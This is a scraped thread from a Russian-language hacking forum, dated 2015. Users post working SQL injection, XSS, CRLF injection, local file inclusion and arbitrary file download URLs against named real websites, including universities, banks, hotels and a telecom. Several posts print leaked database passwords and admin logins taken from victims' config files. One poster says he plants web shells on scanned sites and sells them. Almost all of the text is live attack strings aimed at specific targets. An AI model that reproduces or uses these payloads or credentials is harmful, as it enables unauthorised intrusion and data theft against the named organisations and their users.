http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x 3a,version(),database(),user(),@@version_compile_o s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'=' 0
5.5.41-0
PR-5
Индусы
http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7
5.5.42-cll
PR-3
http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select% 201,concat_ws(0x3a,version(),database(),user(),@@v ersion_compile_os),3,4,5,6,7,8,9,10,11,12
5.1.65
http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%20 1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4
5.0.96-log
PR-3
http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fR oM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x 217e21,user(),0x217e21,version(),0x217e21,database ()))+fRoM+information_schema.tAbLeS+lImIt+0,1),flo or(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRo Up+bY+x)a)+and+'1'='1
5.5.30
PR-5
http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT +count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,ve rsion(),0x217e21))+fRoM+information_schema.tAbLeS+ lImIt+0,1),floor(rand(0)*2))x+fRoM+information_sch ema.tAbLeS+gRoUp+bY+x)a)
5.5.30
PR-4
http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+cou nt(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user() ,0x217e21,version(),0x217e21,database()))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1
Магазин ювелирных изделий
5.5.41-cll-lve
PR-3
В магазине ювелирных изделий(http://www.exboyfriendjewelry.com/index.php), в поле входа пользователей, вписал:
user name: ' or 1=1#
password: ' or 1=1 '#
Зашло под ником: Welcome back ExboyfriendJewelry! походу админ, но точно не знаю.
SQL-inj (Blind):
http://rada.te.ua/poll.php?l=2%20AND%203*2*1%3d6%20AND%20913%3d913
XSS:
http://www.vsesdelki.lviv.ua/offer-i-id-i-409444-%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28 document.cookie%29%3C/ScRiPt%3E-1-o-2-h-urovnevaja.html
http://www.admir.rv.ua/ru-i-classifieds-i-category-i-audio-video-foto-tehnika-i-what-i-1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E-i-where-i-%D0%A0%D0%BE%D0%B2%D0%BD%D0%BE-i-p.html
http://doski.ua/index.php/">alert(document.cookie)
private_static
27.06.2015, 21:18
http://www.lizzart.ru/catpg.php?k=1&t=2&id=-1689%20UNION%20ALL%20SELECT%20NULL%2CCURRENT_USER% 28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C NULL--
lizzart_mysql@10.1.55.253
XSS:
http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eale rt%28document.cookie%29%3C/ScRiPt%3E&st=A
XSS:
http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
XSS:
http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eal ert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69
semen6192
04.07.2015, 21:51
XSS:
http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27antica t.ru%27%29%3C%2Fscript%3E&x=9&y=9
Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.
Спасибо за внимание.
З.Ы. Модерам - прошу закрепить в начале топика.
Попробую проканать за пионера
SQL-inj:
http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-
Вывод в конце правой колонки.
----
http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11, 12,version(),14,15,16,17--+-
Брауновский университет — один из наиболее престижных частных университетов США, расположенный в городе Провиденсе, штата Род-Айленд.Седьмой из старейших национальных университетов и один из девяти колониальных колледжей.SQL Injection
http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os)
5.0.95-log
PR- 8
ТИц - 800
Alexa:9к
Трафф - 2.6кк в месяц.
CRLF-inj (Результат отображается в heade'ре).
http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader: injected_by_ANTICHAT
semen6192
06.07.2015, 20:32
XSS:
http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27 %29%3C%2Fscript%3E
joelblack
07.07.2015, 00:39
target:clanwilliam.info
type: SQL Injection
current user: `clanwi_1@%`
version: 5.5.43-0+DEB7U1-LOG
http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from +information_schema.tables+limit+0,1+--+;
target:sergiev.ru
type:Open Redirect
http://www.sergiev.ru/?q=http://ya.ru
XSS-reflected:
http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealer t%28document.lastmodified%29%3C/ScRiPt%3E
↑ (https://antichat.live/posts/3866815/)
XSS:
http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealer t%28document.lastmodified%29%3C/ScRiPt%3E
Сканером что ли каким то шел? или фазил?
↑ (https://antichat.live/posts/3866819/)
Сканером что ли каким то шел? или фазил?
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.
↑ (https://antichat.live/posts/3866957/)
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.
Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
Кстати, в вашем примере ксс очень условная.
1. Она есть даже при обычной записи alert(1)
2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.
↑ (https://antichat.live/posts/3866957/)
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.
Да и вообще, какой прикол по РУ работать, давай по USA лучше
↑ (https://antichat.live/posts/3866963/)
Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
Кстати, в вашем примере ксс очень условная.
1. Она есть даже при обычной записи alert(1)
2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.
Сканер влепил так, я запрос скопировал и запостил. А профит прост как пять пальцев, выбираю сайты, сканю их, в некоторые заливаю шеллы и продаю. А где нет ничего серьезного, там XSS или SQLi от которых толку особо нет я закидываю сюда) Тут они кому то пригодяться да и я репы получу.
↑ (https://antichat.live/posts/3867003/)
Да и вообще, какой прикол по РУ работать, давай по USA лучше
Шеллы покупают, не уверен что кто-то будет брать USA шелл, покрайней мере, надо будет искать покупателя и скорее всего он не надежный. Конечно есть гарант для таких дел, но я все же придерживаюсь классики)
XSS-reflected:
http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E
HTTP Parametr Pollution (Original Link):
http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549?TAGS=vse-bukety&CODE=otkrytka-vintazhnaya-011&n950821=v972549
Exploit:
http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549
CRLF-inj:
POST mh-proxy.ru/blog/action.php
POST-DATA: id=%0d%0a%20SomeCustomInjectedHeader:injected_by_A NTICHAT
http://guru.ua/
Cookie: user_set_city=%0D%0A%20SomeCustomInjectedHeader:in jected_by_ANTICHAT
POST topclub.ua/
POST DATA: ACT=45&business=1&comment=1&email=sample%40email.tst&form_name=%d0%97%d0%b0%d1%8f%d0%b2%d0%ba%d0%b0%20% d0%bd%d0%b0%20%d0%bf%d1%80%d0%be%d0%b4%d0%b2%d0%b8 %d0%b6%d0%b5%d0%bd%d0%b8%d0%b5%20%d0%b7%d0%b0%d0%b 2%d0%b5%d0%b4%d0%b5%d0%bd%d0%b8%d1%8f&name=hsmryamv¶ms_id=81288&phone=555-666-0606&position=1&redirect_on_duplicate=&RET=http://topclub.ua/pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3 dpages_business%26utm_source%3dtopclub_vn&return=%0d%0a%20SomeCustomInjectedHeader:injected_ by_ANTICHAT&site_id=1&status=open&submit=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8% d1%82%d1%8c%20%d0%b7%d0%b0%d1%8f%d0%b2%d0%ba%d1%83&town=1&URI=pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3 dpages_business%26utm_source%3dtopclub_vn&XID=
XSS:
http://lifetosex.com.ua/tags?tags=%25D0%25A1%25D0%25B5%25D0%25BA%25D1%2581 %2520-%2520%25D0%259A%25D0%25BB%25D0%25B0%25D1%2581%25D1 %2581%25D0%25B8%25D0%25BA%25D0%25B0%3Cvideo%3E%3Cs ource%20onerror%3d%22javascript:alert%281%29%22%3E&tag_list_start=36
XSS-reflected:
http://otsos.info/aubox.php?callback=%27%22%28%29%26%25%3Cacx%3E%3CS cRiPt%20%3Eprompt%28%22For%20Antichat%22%29%3C/ScRiPt%3E&_=1438000881938
XSS-reflected:
http://kofe-spb.ru/feedback.php?complaint=170%3C/textarea%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22% 29%3C/ScRiPt%3E
XSS-reflected:
http://sexytales.org/stories/drama/?ecid[]=42&necid[]=42&order_by=-part_count%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20% 3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E&period=&per_page=
ocheretko
28.07.2015, 10:30
интересная XSS:
http://www.fas.harvard.edu/antichat=%3Cscript%3Ealert%28/antichat/%29;%3C/script%3E%00
XSS-reflected:
http://sonnik.orakul.ua/freyd/ch%3Cvideo%3E%3Csource%20onerror%3d%22javascript:p rompt%281%29%22%3E/
joelblack
04.08.2015, 22:47
target: http://tstu.ru
type: AFD
http://tstu.ru/video/download_img.php?url=/etc/passwd
исправил
blud_niy
06.08.2015, 23:34
SQL-inj (Blind):
http://www.isihac.net/news-article.php?id=-47%27+union+select+1,2,3,4,password,6,7,8+from+use rs+limit+0,1+--+
private_static
07.08.2015, 00:24
XSS
http://www.kadrovik.ru/prc.php?year=2015">alert("xss");
SQL inject
http://orgpoisk.ru/region/id/-8%20union%20select%201,DATABASE%28%29,CURRENT_USER %28%29,4,5,6,7
user:huntfishru_orpsk@localhost
db:huntfishru_orpsk
blud_niy
07.08.2015, 10:08
SQL inject
http://www.bookpourghaz.ir/post.php?id=-suHWoFO3ScI_EQUALS_'+union+select+1,2,3,user(),5,6 ,7,8+--+
http://www.seroqadir.com/read.php?id=-2323'+union+select+1,2,3,user(),5,6+--+
SQL inject
http://library.phcsuphan.ac.th/webpage.contentread.php?id=-6'+union+select+1,user(),3,4,5+--+
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),5,6,7,8,9+--+
http://www.100devok.ru/view_post.php?id=-125'+union+select+1,2,3,4,5,user(),7,8,9,10,11,12, 13,14+--+
joelblack
10.08.2015, 17:21
target:http://www.newpushkino.ru/
type:XSS Reflected
Строка поиска
alert('XSS');
blud_niy
12.08.2015, 15:09
Site: http://www.hungatecottages.co.uk
Уязвимость: SQL Injection
Эксплоит:
http://www.hungatecottages.co.uk/blog-post.php?id=-55'+union+select+1,username,3,4,5,password,7,8,9+f rom+adminusers+limit+0,1+--+
Site: http://www.brandnmc.com
Уязвимость: SQL Injection
Эксплоит:
http://www.brandnmc.com/view-product.php?id=-45'+union+select+1,2,version(),4,5,6,7,8+--+
Site: http://agrovolyn.com
Уязвимость: SQL Injection
Эксплоит:
http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,use r()+from+information_schema.tables+limit+3,1+--+
Site: http://www.siempreenplay.com
Уязвимость: SQL Injection
Эксплоит:
http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+fro m+information_schema.tables+limit+3,1+--+
Site: http://www.fivestarhomefoods.com
Уязвимость: SQL Injection
Эксплоит:
http://www.fivestarhomefoods.com/view_product.php?id=-18'+union+select+1,column_name+from+information_sc hema.columns+where+table_name=%27users%27+limit+03 ,1+--+
joelblack
13.08.2015, 01:36
target:http://www.goravia.ru/
type:XSS Reflected
http://www.goravia.ru/authorization/
POST:
pass=adm&backurl=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B% 3C%2fscript%3E&member=1&user=adm
target:https://www.aviba.ru/
type:XSS Reflected
https://www.aviba.ru/
POST:
locate_start=1&tudaobratno=%3E%3Cscript%3Ealert%28%27hello%27%29% 3B%3C%2fscript%3E&polet_class=E&f_from=%D0%9E%D1%82%D0%BA%D1%83%D0%B4%D0%B0&f_to=%D0%9A%D1%83%D0%B4%D0%B0&f_date2=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%BE&f_date1=%D0%94%D0%B0%D1%82%D0%B0
Heartbleed:
https://avon-ekb.ru
joelblack
13.08.2015, 14:27
target:http://www.tez-tour.com/
type:XSS Reflected
http://www.tez-tour.com/captcha/index.htm?hotelTypeBetter=1&ref=%22%3E%3Cscript%3Ealert%28%27hello,tez%27%29%3 B%3C%2Fscript%3E®ionId=
target:http://www.pstour.ru
type:SQL Injection
login:admin password:' or '1'='1
XSS в поле поиска. Только не знаю какая:Reflected или DOM-based
http://voices.iit.edu/
alert('XSS') (http://voices.iit.edu/)
DDShadoww
14.08.2015, 20:41
target:http://dazo.gov.ua
Type:XSS Reflected
http://dazo.gov.ua/index.php?id=">
target:https://dota2.net
Type:XSS Reflected
https://dota2.net/players/?st=">alert() (https://dota2.net/players/?st=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E)
target:csgo.tm
Type:XSS Reflected
https://csgo.tm/support/
Описание : Переходим по линке и там где надо писать сообщение в саппорт пишем наш скрипт,я пишу ">alert(),дальше нажимаем создать тикет и вуаля(Нужно быть авторизованным в Steam . ) .
hahanovB
16.08.2015, 17:24
Target: http://www.mercerhotel.com/
Type: Arbitrary File Download
http://www.mercerhotel.com/forceDownload.php?file=../../../../../etc/passwd
www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php (http://www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php)
// $cfg['db']['host'] ="internal-db.s29207.gridserver.com";
// $cfg['db']['user'] ="db29207_hotelsab";
// $cfg['db']['password'] ="L'Tbh{))17";
// $cfg['db']['name']="db29207_mercerhotel";
private_static
16.08.2015, 18:32
Error Based SQL inject
http://hentai-x.ru/anime.php?id=3%20AND%20%28SELECT%201%20FROM%28SELE CT%20COUNT%28*%29,CONCAT%28%28MID%28%28IFNULL%28CA ST%28CURRENT_USER%28%29%20AS%20CHAR%29,0x20%29%29, 1,50%29%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20I NFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x% 29lol%29
srv40129_ignilx@localhost
hahanovB
16.08.2015, 20:53
Type: Arbitrary File Download
Target: avalon-school.co.uk
Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../wp-config.php
define('DB_NAME','avalon_school');
/** MySQL database username */
define('DB_USER','avalon-school');
/** MySQL database password */
define('DB_PASSWORD','WEB4374dnfjv');
/** MySQL hostname */
define('DB_HOST','localhost');
Target: trackcars4hire.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/trackcars4hire/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/trackcars4hire/public_html/index.php)
Target: tankers-r-us.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../../home/tankers-r-us/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/tankers-r-us/public_html/index.php)
Target: brighterchoices.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../home/brighterchoices/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/brighterchoices/public_html/index.php)
Target: theknutsfordspa.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../home/theknutsfordspa/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/theknutsfordspa/public_html/index.php)
Target: rhinoequipment.com.au
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/rhinoequipment/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/rhinoequipment/public_html/index.php)
Target: korusgroup.co.uk
Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../../../../home/korusgroup/public_html/index.php
Target: dentalacademy.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/dentalacademy/public_html/index.html (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/dentalacademy/public_html/index.html)
joelblack
20.08.2015, 00:18
target: http://www.kt.kz
type: XSS Reflected
http://www.kt.kz/rus/search/?text=%22%3E%3Cscript%3Ealert%28%27Hello%27%29%3C% 2Fscript%3E
target: http://www.yerkramas.org/advancedsearch
type: XSS Reflected
title:
">alert('Hello')
target: http://www.inet.az
type: XSS Reflected
Строка поиска:
">alert('Hello')
target: http://www.yenixeber.com
type: XSS Reflected
Строка поиска:
">alert('Hello')
target: https://stat.internet.su/
type:SQL Injection
Имя пользователя,Пароль:
' OR 'a'='a
[колор=рэд][сайз=млн]ЯНДЕКС ТИЦ 100500 !!!![/колор][/сайз]
_ttps://drive.google.com/file/d/0B0ox2xf_0TMjWVNHRWlBTU9sSWs/view
hahanovB
20.08.2015, 17:14
Type: Arbitrary File Download
Target: 14isppgconvention.com
Vulnerable: http://www.14isppgconvention.com/forcedownload.php?file=
1. http://www.14isppgconvention.com/forcedownload.php?file=admin/index.php (GET)
Получаем:
if($_SERVER['REQUEST_METHOD']=='POST'){
if($_POST['username']=='14isppg'&&$_POST['password']=='14isppg@admin'){
$_SESSION['user']=1;
header('Location:home.php');
exit;
Логин: 14isppg
Пароль: 14isppg@admin
2. Входим http://www.14isppgconvention.com/admin/
Получаем: http://www.14isppgconvention.com/admin/users.php?export=users
3. http://www.14isppgconvention.com/forcedownload.php?file=admin/users.php (GET)
Находим:
mysql_connect("peterjacob82.powwebmysql.com","14isppg","14isppgS20") or die(mysql_error());
mysql_select_db("14isppg") or die(mysql_error())
Находим:
$FOO_USERNAME="39ispnc";
$FOO_PASSWORD="n0f5qkqjba";
$FOO_SENDERID="ISPPGM";
$FOO_PRIORITY="11";
$urltopost="http://bulksms.smslite.co.in/xmlapi.php";
hahanovB
20.08.2015, 21:02
Type: Arbitrary File Download
Target: tennismatchpoint.net
Vulnerable: www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php (http://www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php)
$PASSWORD='cesenatennis';
if ($PASSWORD==$_POST['password'] &&$_POST['username'] =='admin'){
Логин: admin
Пароль: cesenatennis
hahanovB
20.08.2015, 21:21
Type: Arbitrary File Download
Target: requisur.com
Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php (http://www.requisur.com/pdf/forcedownload.php?file=../configuration.php)
var$dbtype='mysqli';
var$host='localhost';
var$user='gtbaotmh_requisu';
var$db='gtbaotmh_requisu';
var$dbprefix='kxlo_';
var$password='Ry&f#4d*4$0vYk';
hahanovB
22.08.2015, 18:00
Type: Local File Inclusion
Target: com-onlive.tv
Vulnerable: http://www.com-onlive.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
Type: Local File Inclusion
Target: garcinia.com-see.tv
Vulnerable: http://garcinia.com-see.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
Type: Local File Inclusion
Target: garcinia.com-see.tv
Vulnerable: http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd (http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00)
target:ykt.ru
Type:XSS-Reflected
Заходим сюда по линке
ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337%22%27&we=
В поиске вводим ">alert("WX")
И видим XSS .
target:hochu.ua
Type : XSS-Reflected
Описание :
В поиске вводим : ">alert("WX")
Готовая линка : http://hochu.ua/search/?q=">alert("WX") (http://hochu.ua/search/?q=%22%3E%3Cscript%3Ealert%28%22WX%22%29%3C%2Fscri pt%3E)
joelblack
24.08.2015, 19:21
target: http://www.globexbank.ru/
type: XSS Reflected
Курс обмена валют:
">alert('Hello')
hahanovB
24.08.2015, 23:19
Type:SQL Injection
Target:intergips.com.ua
Vulnerable:
http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a78 7a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20C HAR%29%2C0x20%29%2C0x71786b7171%29--%20
Type: SQL Injection
Target: *.mystart.com (212 alexa rang)
PoC:
_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
File_priv=Y
kingbeef
27.08.2015, 19:52
↑ (https://antichat.live/posts/3884970/)
Spoiler: admin and pass
roselynef@vmn.net (mailto:roselynef@vmn.net)
:adminlox
admin link : apps2.mystart.com/admin/
Добавил XSS : apps2.mystart.com/ui/site/index.php?tb='alert('SIXSS')
кек xss с sql норм так .
SIXSS
http://apps2.mystart.com/ui/site/in...27293c2f7363726970743e,3,4+from+mysql.user+-- (http://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,0x3c7363726970743e616c65727428275 34958535327293c2f7363726970743e,3,4+from+mysql.use r+--)
Target:http://www.ecco-shoes.ru/search
Type:XSS-Reflected
Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .
">alert('Hello') .
а также
www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --®ion=Архангельская+область&town=Архангельск
Да и вообще на этом сайте много XSS .
↑ (https://antichat.live/posts/3885456/)
Target:http://www.ecco-shoes.ru/search
Type:XSS-Reflected
Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .
">alert('Hello') .
а также
www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --®ion=Архангельская+область&town=Архангельск
Да и вообще на этом сайте много XSS .
последнее это что?
ocheretko
29.08.2015, 14:24
Это похоже просто на копипаст откудато.
Кстати этот сайт бомбили еще в 2008 году https://older.antichat.net/showpost.php?p=960320&postcount=273
joelblack
29.08.2015, 15:13
target: http://www.kred-bank.ru
type: XSS Reflected
Строка поиска:
">alert('Hello')
target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html (http://6dosug777.com/en/spb/forum/onlajn-magazin-prostitutok-7-921-941-08-87-podberi-sebe-devushku-po-karmanu-raznyie-tsenovyie-kategor.9.html)
Type:XSS-Reflected
'alert('SIXSS')
Там в самом внизу комментарии можно оставлять без всяких заполнений .
Сорри,я там нафлудил чуток) .
Скрипт можете вставить свой,я чисто для примера другой написал .
↑ (https://antichat.live/posts/3885527/)
Это похоже просто на копипаст откудато.
Кстати этот сайт бомбили еще в 2008 году
https://older.antichat.net/showpost.php?p=960320&postcount=273
Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу .
А последнее это та же XSS,но на крайняк может понадобиться .
joelblack
29.08.2015, 17:30
target: http://sobinbank.ru/
type: Open Redirect
http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru
target: http://sinko-bank.ru
type: XSS Reflected
Строка поиска:
">alert('Hello')
DDShadoww
29.08.2015, 18:13
target:http://halykbank.kz
type: XSS-Reflected
http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscrip t%3E
Target:home.singtel.com
Type: SQL injection
http://home.singtel.com/include/tell_a_friend_process.asp
POST:
segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&email_sent_=xapt0x@xapk.ru' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5
singtelsgp
singtelsgp-stag
miotv-stag
singtelmiotvstaffplan
miotv-prd
STSGP09-stag
STSGP09
ClickCounter
STMIO-STAG
STMIO
uefa-phase1
uefa-prod
uefa-stag
STSGP2011-stag-KIV
STSGP2011-KIV
race2011-stag
race2011-prod
singtelcorp2010new
yog
YOGWEBCAST
STCON
STBIZ
singtel_3
singtel_3_Monday1
eids_sso
accelerate
browdb
faceapp-stag
faceapp-prod
distis_agent
miotv400k_prd
DDShadoww
30.08.2015, 13:48
target:3dnews.ru (http://www.3dnews.ru/)
type: DOM Based XSS
В поля поиска
alert(1)
target:subscribe.ru
type:XSS-Reflected
Поиск :
alert('XSS')
Кто-то уже до меня нашёл :Р .
DDShadoww
30.08.2015, 21:21
XSS на мобильной версии сайта KFC
target:m.kfc.ru/career-vacancies/member
type: XSS-Reflected
В поля Фамилия, имя вводим
">alert("XSS")
и так же в поле Мобильный телефон
DDShadoww
30.08.2015, 22:12
BurgerKing
target: burgerking.ru
type: XSS-Reflected
В поля поиска
">alert(1)
Target: _ttp://www.edelws.ru (http://www.edelws.ru)
Type : XSS-Reflected(вбивается под поисковик .)
">alert("WH")
psihoz26
02.09.2015, 14:38
↑ (https://antichat.live/posts/3885795/)
target:3dnews.ru (http://www.3dnews.ru/)
type: XSS-Reflected
В поля поиска
alert(1)
это DOM based XSS
работает даже в хроме
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
BabaDook
02.09.2015, 14:44
↑ (https://antichat.live/posts/3886787/)
это DOM based XSS
работает даже в хроме
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
страннло что у меня не работает, может хром старый?
ocheretko
02.09.2015, 15:10
↑ (https://antichat.live/posts/3886789/)
страннло что у меня не работает, может хром старый?
Введи в поиск и нажми значок поиска alert(1)
https://i.gyazo.com/f5a8ceea0731dfc1091da8154529bcca.png
http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C% 2Fscript%3E
пассивно-активная XSS.
Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
DDShadoww
08.09.2015, 10:02
Target: allbanks.ru
Type: Reflected
В поля поиска -
">alert(1)
Target: capitalbank.kz/oldsite/
Type: Reflected
В поля поиска -
">alert(1)
Target: asbank.ru/
Type: Reflected
В поля поиска -
">alert(1)
↑ (https://antichat.live/posts/3886778/)
Target: _ttp://www.edelws.ru (http://www.edelws.ru)
Type : XSS-Reflected(вбивается под поисковик .)
"<>script>alert("WH")
Видимо опечатка - второй и третий символ надо поменять местами
">alert("WH")
DDShadoww
12.09.2015, 20:53
Target: foto7an.se
Type:Reflected and Stored
Весь в XSS. И еше бонус - foto7an.se/files/
Ссылкаnlinetrade.ru
Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2 fscript%253E&c=399581">alert("WH")>
Ссылка: patee.ru
Тип:XSS-Reflected
">alert("WH")
Регистрируемся,создаем рецепт
Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"
Там где число пропорции пишем любое число(только не сильно большое)
"Время приготовления в минутах " так же .
Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .
После отправляем и видим XSS-Reflected .
↑ (https://antichat.live/posts/3891317/)
Ссылкаnlinetrade.ru
Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2 fscript%253E&c=399581">alert("WH")>
разберитесь с определениями.
tipa_cracker
16.09.2015, 20:22
Самый переломанный сайт --> http://vivactiv.ru/trainings/traine..._concat(login,0x3a,password),2,3+from+adm in-- (http://vivactiv.ru/trainings/trainers.php?id=4+UNION+select+group_concat(login, 0x3a,password),2,3+from+admin--)
DDShadoww
19.09.2015, 01:51
Target: alfa.com.tw
Type: XSS Reflected
http://www.alfa.com.tw/search.php?keyword=">alert(1)
А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.
XSS-reflected:
www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25prompt(935766)
joelblack
20.09.2015, 18:39
target: http://www.unifinbank.ru/
type: XSS Reflected
Строка поиска:
">alert('hello')
STREIT Group - Armored Cars Manufacturer
http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
ТИЦ 30
PR 3
AR 969,040
